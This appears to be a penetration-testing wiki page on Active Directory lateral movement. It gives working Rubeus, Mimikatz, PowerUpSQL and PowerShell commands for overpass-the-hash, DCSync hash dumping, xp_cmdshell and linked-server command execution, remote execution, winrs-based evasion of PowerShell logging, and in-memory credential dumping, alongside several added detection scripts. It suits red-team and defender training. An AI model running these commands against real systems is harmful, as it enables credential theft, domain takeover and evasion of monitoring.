# Lateral Movement
This section covers techniques for lateral movement in Active Directory environments.
## Overpass the Hash
Overpass the Hash uses an account's NTLM hash, which is also its RC4-HMAC Kerberos key, to request a Kerberos Ticket Granting Ticket (TGT) from the KDC. The TGT can then be used in a pass-the-ticket attack to request service tickets, granting access to the targeted services over Kerberos instead of NTLM. Because the request is made with an RC4 key, the resulting TGT is encrypted with RC4-HMAC (encryption type 0x17), which stands out in 4768 events on domains where clients normally negotiate AES. Where the account's AES256 key is available, prefer `/aes256`; Rubeus' `/opsec` option exists to make the request look like a genuine Windows client, which negotiates AES256, so combining it with an RC4 key undercuts that goal.

You can use Rubeus to request a TGT from an NTLM hash and inject it into a logon session:

```powershell
# Request a TGT with the RC4 key and inject it into the current logon session (/ptt)
Rubeus.exe asktgt /user:<username> /domain:<domain> /rc4:<ntlm_hash> /ptt

# Spawn cmd.exe in a new sacrificial (netonly) logon session and inject the TGT there,
# leaving the current session's tickets untouched; /show makes the new window visible
Rubeus.exe asktgt /user:administrator /rc4:<ntlm_hash> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

Alternatively, you can perform the same operation using Mimikatz. `sekurlsa::pth` starts a process in a new netonly logon session and patches the RC4 key into LSASS memory for that session, so it requires local administrator rights and SeDebugPrivilege:

```powershell
privilege::debug
sekurlsa::pth /user:<username> /domain:<domain> /rc4:<ntlm_hash> /run:cmd.exe
```
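To see the RC4 caveat in practice, the following added example (not part of the original page, nor of the Rubeus or Mimikatz projects) hunts a domain controller's Security log for successful TGT requests negotiated with RC4-HMAC. The event ID and field names are those of the standard 4768 audit record; running on the DC itself by default and the 24-hour window are assumptions made for illustration.

```powershell
# Added example: find TGT requests (event 4768) whose ticket was encrypted with RC4-HMAC (0x17).
# An NTLM-hash-based asktgt / sekurlsa::pth request produces exactly this encryption type, while
# current Windows clients negotiate AES256 (0x12). Needs rights to read the Security log on the DC.
function Get-Rc4TgtRequest {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # assumption: run directly on a DC by default
        [int]$Hours = 24                             # assumption: one-day window
    )

    $since = (Get-Date).ToUniversalTime().AddHours(-$Hours).ToString('o')

    # Only successful (Status 0x0) RC4 TGT requests inside the time window.
    $xpath = "*[System[EventID=4768 and TimeCreated[@SystemTime>='$since']]" +
             " and EventData[Data[@Name='TicketEncryptionType']='0x17' and Data[@Name='Status']='0x0']]"

    Get-WinEvent -ComputerName $ComputerName -LogName Security -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            # Flatten the <Data Name="..."> elements of the event into a hashtable.
            $xml  = [xml]$_.ToXml()
            $data = @{}
            foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }

            [pscustomobject]@{
                Time     = $_.TimeCreated
                User     = $data['TargetUserName']
                Domain   = $data['TargetDomainName']
                ClientIP = ($data['IpAddress'] -replace '^::ffff:', '')
                PreAuth  = $data['PreAuthType']          # 2 = encrypted timestamp, the norm for key-based requests
                EType    = $data['TicketEncryptionType']
            }
        }
}

# Usage: RC4 TGTs for user accounts only (computer accounts end in '$'), newest first.
Get-Rc4TgtRequest -Hours 24 |
    Where-Object { $_.User -notmatch '\$$' } |
    Sort-Object Time -Descending |
    Format-Table Time, User, Domain, ClientIP, PreAuth, EType -AutoSize
```

RC4 TGTs are also legitimate for accounts or trusts that have AES disabled, so baseline first. What stands out is an RC4 request for a user that otherwise negotiates AES, arriving from a workstation that is not that user's own.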
## DCSync
DCSync is a technique that allows an account with replication rights to impersonate a Domain Controller and request credential data from Active Directory over the Directory Replication Service remote protocol (MS-DRSR, the `IDL_DRSGetNCChanges` call). The returned data includes the password hashes of any domain account, including the `krbtgt` account and domain administrators, and the DC serves the request like ordinary replication traffic.
To successfully perform DCSync, the account must hold both of the following extended rights on the domain object:
- Replicating Directory Changes
- Replicating Directory Changes All
By default these are granted to Administrators, Domain Admins, Enterprise Admins and the Domain Controllers themselves. Any other principal holding both (the Azure AD Connect synchronization account is a common example) is effectively a domain admin. When directory service access auditing is enabled, a DCSync request appears on the DC as event 4662 on the domain object with the replication control access rights in its Properties field; a request from a host that is not a domain controller is the tell.
DCSync can be performed using Mimikatz, for example to extract the krbtgt hash:
```powershell
lsadump::dcsync /domain:<domain> /user:krbtgt
```
Replacing `/user:<account>` with `/all /csv` dumps every account in one pass.
The NTLM hash of the krbtgt account can be used to forge a Golden Ticket, which grants access to any resource in the domain and stays valid until the krbtgt password has been changed twice.
## MSSQL Servers
Microsoft SQL (MSSQL) Servers are commonly deployed across Windows domains, making them valuable targets for lateral movement. MSSQL integrates with Active Directory through Windows authentication: domain users and groups are mapped to server logins and database roles, so a domain account may already hold access to instances across the domain (and, through trusts, across domains) without any SQL credential. That integration, together with OS command execution and linked servers, provides opportunities for lateral movement and privilege escalation.
The PowerUpSQL toolkit is a powerful resource for interacting with MSSQL Servers. It supports discovering SQL instances, auditing for weak configurations, escalating privileges and performing post-exploitation tasks.
To get started, import the PowerUpSQL module in PowerShell:
```powershell
Import-Module .\PowerUpSQL.psd1
```
### Enumerate MSSQL Servers
PowerUpSQL locates MSSQL instances in the domain by querying Active Directory for `MSSQLSvc` service principal names (SPNs), so no network scan is needed. Use the following commands to enumerate and gather information:
```powershell
Get-SQLInstanceDomain
```
Retrieve detailed server information (version, service account, whether the current login is sysadmin):
```powershell
Get-SQLInstanceDomain | Get-SQLServerInfo
```
Check which instances the current domain user can log in to:
```powershell
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded
```
Scan an instance for misconfigurations and known escalation paths:
```powershell
Invoke-SQLAudit -Instance mssql.example.local -Verbose
```
### Execute SQL queries
Once access to an MSSQL Server is confirmed, you can execute SQL queries to gather information or manipulate the database. For example, return the login the server has mapped you to:
```powershell
Get-SQLQuery -Query "SELECT system_user" -Instance mssql.example.local
```
### Execute OS commands
MSSQL Servers can execute OS commands via the `xp_cmdshell` extended stored procedure, which is disabled by default. Enabling it requires the sysadmin role, and the commands run as the SQL Server service account, which is often a privileged domain account. Enable it using the following command:
```powershell
Get-SQLQuery -Query "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE" -Instance mssql.example.local
```
Execute OS commands:
```powershell
Get-SQLQuery -Query "EXEC xp_cmdshell 'whoami'" -Instance mssql.example.local
```
PowerUpSQL's `Invoke-SQLOSCmd` cmdlet wraps both steps. Note that enabling `xp_cmdshell` is a persistent configuration change on the server and is exactly what `Invoke-SQLAudit` flags, so restore the original setting when you are done.
### Database Links
Database links (linked servers) let an MSSQL Server run queries against external data sources such as other SQL Servers or OLE DB providers. A link carries its own authentication context: either the caller's Windows identity is forwarded, or a fixed SQL login is stored in the link definition. In the latter case every caller reaches the remote instance as that login, which is why links can be followed across domain and forest boundaries that the caller's own credentials would never cross, and why a chain of links can end on an instance where the stored login is sysadmin.
Enumerate database links from a target instance:
```powershell
Get-SQLServerLink -Instance mssql.example.local -Verbose
```
Crawl all linked servers recursively:
```powershell
Get-SQLServerLinkCrawl -Instance mssql.example.local
```
Execute a query across all linked servers (for example, run an OS command):
```powershell
Get-SQLServerLinkCrawl -Instance mssql.example.local -Query "EXEC master..xp_cmdshell 'whoami'"
```
Use the `-QueryTarget` parameter to run the query on one specific server in the chain rather than on every server. Executing procedures through a link requires RPC Out to be enabled on that link, and `xp_cmdshell` must already be enabled on the server where the command runs (or be enabled through the link, which again needs RPC Out).
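As an added example covering both the OS-command and the linked-server sections, the function below performs the pre-flight checks a tester wants before touching `xp_cmdshell` or crawling links: the current login's sysadmin status, whether `xp_cmdshell` is already enabled, which logins can be impersonated, and which linked servers exist and allow RPC Out. It is not PowerUpSQL code and not from the original page; it uses only System.Data.SqlClient with integrated authentication (Windows PowerShell 5.1 or PowerShell 7 on Windows), reads catalog views only, and the instance name is a placeholder.

```powershell
# Added example: dependency-free MSSQL pre-flight check over integrated (Kerberos/NTLM) authentication.
# Read-only: it queries catalog views and changes nothing on the server.
function Get-SqlAttackSurface {
    param(
        [Parameter(Mandatory)][string]$Instance   # e.g. mssql.example.local or host\INSTANCE (placeholder)
    )

    $cs   = "Server=$Instance;Integrated Security=SSPI;Encrypt=True;TrustServerCertificate=True;Connect Timeout=5"
    $conn = New-Object System.Data.SqlClient.SqlConnection($cs)
    $conn.Open()

    $queries = [ordered]@{
        # Who the server thinks we are, and whether we already hold sysadmin.
        Identity = "SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin"

        # value_in_use = 1 means xp_cmdshell is already on, so no sp_configure change is needed.
        XpCmdshell = "SELECT name, CAST(value_in_use AS int) AS value_in_use
                      FROM sys.configurations WHERE name = 'xp_cmdshell'"

        # IMPERSONATE grants at server scope (class 101): grantee may EXECUTE AS LOGIN = target,
        # a classic path to sysadmin when the target is sa or another sysadmin login.
        Impersonation = "SELECT gr.name AS grantee, tg.name AS target
                         FROM sys.server_permissions pe
                         JOIN sys.server_principals gr ON pe.grantee_principal_id = gr.principal_id
                         JOIN sys.server_principals tg ON pe.major_id = tg.principal_id
                         WHERE pe.class = 101 AND pe.permission_name = 'IMPERSONATE' AND pe.state IN ('G', 'W')"

        # Linked servers; EXEC ... AT <link> (and enabling xp_cmdshell remotely) needs is_rpc_out_enabled = 1.
        Links = "SELECT name, data_source, is_rpc_out_enabled
                 FROM sys.servers WHERE is_linked = 1"
    }

    try {
        $results = [ordered]@{}
        foreach ($key in $queries.Keys) {
            $cmd = $conn.CreateCommand()
            $cmd.CommandText = $queries[$key]
            $table  = New-Object System.Data.DataTable
            $reader = $cmd.ExecuteReader()
            $table.Load($reader)
            $reader.Close()
            $results[$key] = $table
        }
        [pscustomobject]$results
    }
    finally {
        $conn.Close()
    }
}

# Usage
$surface = Get-SqlAttackSurface -Instance 'mssql.example.local'
$surface.Identity      | Format-Table -AutoSize
$surface.XpCmdshell    | Format-Table -AutoSize
$surface.Impersonation | Format-Table -AutoSize
$surface.Links         | Format-Table -AutoSize
```

If `is_sysadmin` is 0 but an impersonation path to a sysadmin login exists, that path is the quieter route to `xp_cmdshell`; if a link shows `is_rpc_out_enabled` = 1, it is a candidate for `Get-SQLServerLinkCrawl` with an OS command.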
## PowerShell Remoting
PowerShell Remoting (PSRemoting) is a feature of Windows PowerShell that lets you run PowerShell commands or scripts on remote computers. It is built on Windows Remote Management (WinRM), Microsoft's implementation of the WS-Management protocol, which listens on TCP 5985 (HTTP) and 5986 (HTTPS). By default the caller must be a local administrator (or a member of Remote Management Users) on the target and authenticates with Kerberos, so connect by FQDN; NTLM and raw IP addresses only work when the target is in the client's TrustedHosts list or HTTPS is used. This makes PSRemoting useful for lateral movement once you hold credentials for an account with local administrative rights on other hosts.
### Connect to a remote host
Maintain a persistent interactive session with a remote host, similar to SSH. To pass explicit credentials, use the `-Credential` parameter; without it, the current logon session's Kerberos identity is used.
```powershell
$session = New-PSSession -ComputerName <hostname>
Enter-PSSession -Session $session
```
```powershell
$password   = ConvertTo-SecureString '<password>' -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential('example\user', $password)
$session    = New-PSSession -ComputerName <hostname> -Credential $credential
Enter-PSSession -Session $session
```
### Run commands on remote host
Execute commands on a remote host without an interactive session; the results come back to the local session as deserialized objects.
```powershell
Invoke-Command -ComputerName <hostname> -ScriptBlock { Get-Process }
```
### Run commands on multiple hosts
It is possible to run commands on multiple hosts by providing a list of hostnames. `Invoke-Command` fans out in parallel (32 concurrent connections by default, adjustable with `-ThrottleLimit`) and tags every returned object with the `PSComputerName` it came from.
```powershell
Invoke-Command -ComputerName (Get-Content <list_of_servers>) -ScriptBlock { Get-Process }
```
### Execute local script
Run a local script on a remote host. The file is read locally and its contents are sent over the session, so the script never has to exist on the target's disk.
```powershell
Invoke-Command -ComputerName <hostname> -FilePath C:\scripts\Get-PassHashes.ps1
```
### Run locally loaded function on remote host
To run a function defined in the local session on a remote host, pass its body with the `${function:<function_name>}` syntax. Only that one function is shipped, so any helper functions it depends on must be sent the same way.
```powershell
Invoke-Command -ComputerName (Get-Content <list_of_servers>) -ScriptBlock ${function:Get-PassHashes}
```
### Bypass Logging
PowerShell Remoting is subject to the same PowerShell transcription, module logging and script block logging as a local PowerShell session, so when those policies are enabled on the target, every command you send is recorded. `winrs`, which runs a cmd.exe shell over the same WinRM transport, never enters a PowerShell host and therefore sidesteps PowerShell's logging entirely:
```powershell
winrs -remote:<hostname> -u:<username> -p:<password> hostname
```
This avoids only the PowerShell logs: the target still records the WinRM shell in the Microsoft-Windows-WinRM/Operational log, a network logon (event 4624, logon type 3) and, where process auditing or Sysmon is enabled, cmd.exe being spawned under winrshost.exe. Passing `-p:<password>` on the command line also exposes the password to process-creation logging on the source host.
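winrs is quieter, not silent. The added example below (not part of the original page) inspects a host's Microsoft-Windows-WinRM/Operational log for shell-creation events (event ID 91) and separates winrs-style cmd shells from PowerShell remoting by the ResourceUri named in the event message. The log name, event ID and the two resource URIs are WinRM's own; running against the local host by default and the 24-hour window are assumptions.

```powershell
# Added example: inventory incoming WinRM shells on a host and tell winrs (cmd shell URI) apart from
# PowerShell remoting (Microsoft.PowerShell URI). Event 91 = "Creating WSMan shell on server with ResourceUri".
function Get-WinRmShellEvent {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,   # assumption: inspect the local host by default
        [int]$Hours = 24                             # assumption: one-day window
    )

    $since = (Get-Date).ToUniversalTime().AddHours(-$Hours).ToString('o')
    $xpath = "*[System[EventID=91 and TimeCreated[@SystemTime>='$since']]]"

    Get-WinEvent -ComputerName $ComputerName -LogName 'Microsoft-Windows-WinRM/Operational' `
                 -FilterXPath $xpath -ErrorAction SilentlyContinue |
        ForEach-Object {
            # The ResourceUri is part of the rendered message; regex it out rather than rely on Data ordering.
            $uri  = if ($_.Message -match 'ResourceUri:\s*(\S+)') { $Matches[1] } else { '' }
            $kind = switch -Wildcard ($uri) {
                '*/windows/shell/cmd' { 'winrs / cmd shell' }
                '*/powershell/*'      { 'PowerShell remoting' }
                default               { 'other' }
            }
            [pscustomobject]@{
                Time        = $_.TimeCreated
                UserSid     = $_.UserId          # SID of the authenticated caller, when recorded
                Kind        = $kind
                ResourceUri = $uri
            }
        }
}

# Usage: winrs sessions appear as cmd-shell URIs even though no PowerShell logging fired.
Get-WinRmShellEvent | Sort-Object Time -Descending | Format-Table -AutoSize
```

Correlate the timestamps with 4624 logon type 3 events on the same host to recover the source address and account behind each shell.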
## Mimikatz
Mimikatz is a post-exploitation tool that can extract plaintext passwords, NTLM hashes and Kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket and build Golden Tickets.
### Dump credentials on a local machine
The following methods extract credentials from the memory of the LSASS process on the local machine. They need local administrator rights plus SeDebugPrivilege (`privilege::debug`), and they fail when LSASS runs as a protected process (RunAsPPL) unless a driver is loaded, or when Credential Guard keeps the secrets outside LSASS memory altogether.
Invoke-Mimikatz is a PowerShell script that embeds the Mimikatz binary as a byte array and, using the code from Invoke-ReflectivePEInjection, loads it reflectively into memory without writing it to disk.
```powershell
# Equivalent to running sekurlsa::logonpasswords
Invoke-Mimikatz -DumpCreds
# Pass arbitrary Mimikatz commands; note the nested quoting
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
```